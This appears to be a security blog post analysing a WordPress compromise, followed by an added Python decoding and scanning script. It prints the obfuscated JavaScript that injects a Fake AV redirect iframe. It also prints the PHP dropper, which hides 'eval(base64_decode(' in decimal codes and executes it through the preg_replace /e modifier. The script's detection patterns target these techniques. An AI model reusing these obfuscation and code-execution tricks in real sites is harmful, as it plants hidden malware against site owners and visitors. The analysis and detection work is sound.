Continuing injections from *.no-ip.biz

I don't think we have logged about it lately, but an old infection (one that started early this year) is still going strong. The result is this code being injected into the site when it is visited by certain browsers:

var j=0; while(j<230) 
document.write(String.fromCharCode("=tuzmf?/{q8rcbjsci!|!qptjujpo;bctpmvuf<..
!mfgu;.2396qy#{q8rcbjsci#?=jgsbnf!tsd>#iuuq;00..
ifjhiu>#651#?=0jgsbnf?=0ejw?"
.charCodeAt( j++)-1));

And the hidden code that generates it is tricky to find and is generally hidden inside one of the theme files or wp-includes (on WordPress sites). It looks like this:

function check_image_c()
{
        // decimal char codes that decode to a file path under wp-content/uploads
        $imagepath = array (
  0 => "47 118 97 114 47 119 119 119 47 116 104 111 117 103 104 116 102 117 108 119 111 109 101 110 46",
  1 => "111 114 103 47 119 112 45 99 111 110 116 101 110 116 47 117 112 108 111 97 100 115 47 50 48",
  2 => "49 51 47 48 51 47 117 112 97 110 100 117 112 46 106 112 103",
);
...
        // decimal char codes that decode to: eval(base64_decode('
        $image = "101 118 97 108 40 98 97 115 101 54 52 95 100 101 99 111 100 101 40 39";
        $image = implode("", array_map("chr", explode(" ", $image)));
        // function name split in two so a grep for preg_replace does not hit it
        $a = 'pre' . 'g_replace';
        // the /e modifier makes preg_replace evaluate the replacement as PHP code
        $a("/.*/e", $image . $code . "'));", "");
                return false;
}
check_image_c();

All that to the end goal: Inject an iframe from *no-ip.biz (and other free domains) that will redirect the browser of the victim to Fake AV.
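To help with cleanup and triage, here is an added helper script (not part of the original post, and not code from the infected sites) that undoes both layers of obfuscation shown above: it recovers the markup hidden in the `String.fromCharCode(...-1)` loop, decodes the space-separated decimal strings used by the PHP dropper, and flags the indicators a file scan should look for (`/e` regex modifier, `array_map("chr", ...)`, long decimal runs). The sample JavaScript and PHP inputs are constructed here for the demonstration; the iframe hostname is a placeholder because the post truncates the real one, and `$code` is left undefined exactly as in the snippet above.

```python
import re

# --- Layer 1: the injected JavaScript ---------------------------------------
# Undo document.write(String.fromCharCode(s.charCodeAt(j++) - shift)).
def decode_shifted(encoded: str, shift: int = 1) -> str:
    return "".join(chr(ord(c) - shift) for c in encoded)

# Matches the exact loop shape seen in the injection: a quoted string whose
# characters are read with charCodeAt(j++) and then decremented by a constant.
FROMCHARCODE_RE = re.compile(
    r'String\.fromCharCode\(\s*"([^"]*)"\s*\.charCodeAt\(\s*\w+\+\+\s*\)\s*-\s*(\d+)\s*\)'
)

def extract_injected_markup(js: str) -> list:
    """Return the decoded markup of every fromCharCode loop found in js."""
    return [decode_shifted(m.group(1), int(m.group(2))) for m in FROMCHARCODE_RE.finditer(js)]

# Constructed sample: the element id and height are the values the post's string
# decodes to; the iframe host is a placeholder, not the real one.
PLAIN_MARKUP = '<div id="zp7qbairbh"><iframe src="http://PLACEHOLDER.invalid/" height="540"></iframe></div>'
ENCODED_MARKUP = "".join(chr(ord(c) + 1) for c in PLAIN_MARKUP)
SAMPLE_JS = 'var j=0; while(j<%d) document.write(String.fromCharCode("%s".charCodeAt( j++)-1));' % (
    len(ENCODED_MARKUP), ENCODED_MARKUP)

# --- Layer 2: the PHP dropper ------------------------------------------------
# Undo implode("", array_map("chr", explode(" ", "101 118 97 ...")))
def decode_decimal(s: str) -> str:
    return "".join(chr(int(n)) for n in s.split())

INDICATORS = {
    # a regex literal carrying the deprecated /e modifier (code execution via preg_replace)
    "regex_e_modifier": re.compile(r'''["']/.*?/[a-zA-Z]*e[a-zA-Z]*["']'''),
    # chr() mapped over a list, the usual way decimal-encoded strings are rebuilt
    "chr_array_map": re.compile(r'''array_map\s*\(\s*["']chr["']'''),
    # a quoted run of at least nine space-separated numbers
    "decimal_encoded_string": re.compile(r'''["']((?:\d{1,3}\s+){8,}\d{1,3})["']'''),
}

def scan_php(source: str) -> dict:
    """Report which indicators fire and what the decimal strings decode to."""
    hits = {}
    for name, rx in INDICATORS.items():
        found = [m.group(0) for m in rx.finditer(source)]
        if found:
            hits[name] = found
    hits["decoded_strings"] = [
        decode_decimal(m.group(1)) for m in INDICATORS["decimal_encoded_string"].finditer(source)
    ]
    return hits

# Constructed sample shaped like the dropper in the post (path array omitted).
SAMPLE_PHP = r'''<?php
function check_image_c()
{
        $image = "101 118 97 108 40 98 97 115 101 54 52 95 100 101 99 111 100 101 40 39";
        $image = implode("", array_map("chr", explode(" ", $image)));
        $a = 'pre' . 'g_replace';
        $a("/.*/e", $image . $code . "'));", "");
        return false;
}
check_image_c();
'''

if __name__ == "__main__":
    for markup in extract_injected_markup(SAMPLE_JS):
        print("injected markup:", markup)
    for key, value in scan_php(SAMPLE_PHP).items():
        print(key, "->", value)
```

Running the script on a suspect theme file or wp-includes script is a quick first pass; the `decoded_strings` entry is what tells you whether a harmless-looking list of numbers is actually `eval(base64_decode('`. The indicators are heuristics, so treat a hit as a reason to read the file, not as proof by itself.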
